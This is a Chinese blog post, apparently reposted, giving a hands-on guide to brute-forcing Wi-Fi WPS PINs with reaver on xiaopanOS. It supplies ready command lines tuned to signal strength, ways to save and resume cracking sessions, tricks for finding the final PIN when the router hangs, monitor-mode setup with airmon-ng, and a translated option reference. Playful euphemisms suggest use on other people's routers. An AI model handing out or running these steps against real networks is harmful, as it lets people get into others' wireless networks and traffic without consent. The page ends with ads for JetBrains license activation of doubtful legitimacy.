大家好,又见面了,我是你们的朋友全栈君。
(非TP-LINK路由推荐–d9 –t9参数防止路由僵死
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
小结-学习时应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d 5 -c 1
参数一:-a -n -N -x 20 -r 100:10 -| 60 -t 2 -v d 0 (我默认使用这个)
参数二:-a –v –N –x20–r100:10 l300 –t12 –d0 (如想多等会,可将–t12修改为–t15等)
参数三:-a –v –S –x20–r100:10 l300 –t12 –d0 (如重码多且速度太快,可将–d0修改为–d2)等)
参数四:-a –v –N –x20–r100:10 l300 –t12 –d0 –S(其他参数也可试一下,不要加-n)
xiaopanOS中reaver参数
-a -v -S -x 20 -r 100:10 -l 300
光盘启动、u盘/硬盘启动保存学习进度的方法
reaver1.3的保存路径:打开桌面最后边一个图标xfec 定位到/etc/reaver下,有一个wpc后缀的文件,名字是你学习的目标的mac地址,复制到你的U盘,路径是/mnt/sdb1(一般是这个,自己找找,要是没有东西就右键mount),以后重启到xiaopanOS,把这文件复制到原来的路径,再试试,可以载入进度了!o(∩_∩)o 哈哈
reaver1.4的保存路径:保存目录:/usr/local/etc/reaver如果xfe文件管理器未获得ROOT权限。请先运行root shell后输入xfe即可获得root权限。保存方法同上。下次重启动后,再手工复制到/etc/reaver/ 目录下即可
MAC地址.wpc 其实是个文本文件,格式与破密用字典酷似,其第一行和第二行,分别是4位数和3位数的指示位置数(+4)。
——————————————————————————
如果进度到99.9%后,AP死机,可打开它,总共1000个3位数,找出剩余的十几个PIN码,用QSS、WPS客户端软件,手动测试、破密。如果是跑了99.99%死机, 意味吗? 你懂的吧? 最后一个PIN就是。
以下这个命令是指定PIN码,获得WPA 密码PSK
reaver -i mon0 -b MAC -p PIN8位数
如果上述措施不后,仍不见PSK密码,可能因软件原因,漏码了!需要重新跑后三位数!
(前四位正确的话)reaver -i mon0 -b MAC -p PIN前4位数
1.遇见8187驱动RF-kill的 xiaopanos
对8187的网卡支持不是太好,有时会出现驱动加载不了,就是输入第一条命令后出现operation not possible due to RF-kill,我想大部分人也遇到过把。新版本0.34使用命令rfkill unblock all解决这个问题,容易出现问题的是0.3.2版本的。
第一种尝试的解决办法:这时候就断开USB,等上大概10几秒把再插上,连续插拔几次总有一次会好。
第二种尝试的解决办法:先运行一下奶瓶扫描一会,然后退出奶瓶。 虚拟机 USB图标(USB图标上的小点)由深绿变成浅绿色,变浅绿就输入
ifconfig wlan0 up
airmon-ng start wlan0
第三种解决办法:出现错误后的解决
a.Root Shell窗口敲击命令“ifconfig -a”,查看最后一项是否出现wlan0,这个就是你的无
线网卡。如果没有出现拔插网卡,直到测试出现wlan0。
b.接下来输入第二条命令“ifconfig wlan0 up”,接下来第三条“airmon-ng start wlan0”载入
网卡。如果出现operation not possible due to RF-kill,不要惊慌继续输入命令“airmon-ng start
wlan0”多输入几次,然后拔出USB网卡,再插入,重复第2步的命令。一般情况下就会
正常载入了括号内只会显示monitor mode enabled on mon0,不会出现operation not possible
due to RF-kill,如果不行以上步骤再次重复,直到解决。
c.输入“airodump-ng mon0”(如果括号内显示的是monitor mode enabled on mon1,相应的
命令就改为airodump-ng mon1,其他的类似),测试一下,要是可以正常扫描,说明8187L加载成功,就可以reaver了,你懂的!
reaver参数说明
必须参数
-i, –interface=<wlan> Name of the monitor-mode interface to use 网卡的监视接口,通常是mon0
-b, –bssid=<mac> BSSID of the target AP
AP的MAC地址
Optional Arguments: 可选参数
-m, –mac=<mac> MAC of the host system
指定本机MAC地址
-e, –essid=<ssid> ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f) 信号的频道,如果不指定会自动扫描 -o, –out-file=<file> Send output to a log file [stdout]
输出日志文件
-s, –session=<file> Restore a previous session file
恢复进度文件
-C, –exec=<command> Execute the supplied command upon successful pin recovery pin成功后执行命令
-D, –daemonize Daemonize reaver
设置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP 对目标AP自动检测高级参数
-f, –fixed Disable channel hopping
禁止频道跳转
-5, –5ghz Use 5GHz 802.11 channels
使用5G频道
-v, –verbose Display non-critical warnings (-vv for more) 显示不重要警告信息 -vv 可以显示更多 -q, –quiet Only display critical messages
只显示关键信息
-h, –help Show help
显示帮助
Advanced Options:高级选项
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin 使用指定的4位或者8位pin码 -d, –delay=<seconds> Set the delay between pin attempts [1] pin间延时,默认1秒
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts
[60]
AP锁定WPS后等待时间
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次数
1/2
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures
[0]
10次意外失败后等待时间,默认0秒 -r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts 每x次pin后等待y秒
-t, –timeout=<seconds> Set the receive timeout period [5] 收包超时,默认5秒
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] M5/M7超时,默认0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
不连入AP(连入过程必须有其他程序完成) -N, –no-nacks Do not send NACK messages when out of order packets are received
不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-S, –dh-small Use small DH keys to improve crack speed 使用小DH关键值提高速度(推荐使用) -L, –ignore-locks Ignore locked state reported by the target AP 忽略目标AP报告的锁定状态
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet 每当收到EAP失败包就终止WPS进程 -n, –nack Target AP always sends a NACK [Auto] 对目标AP总是发送NACK,默认自动 -w, –win7 Mimic a Windows 7 registrar [False] 模拟win7注册,默认关闭
Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/135873.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...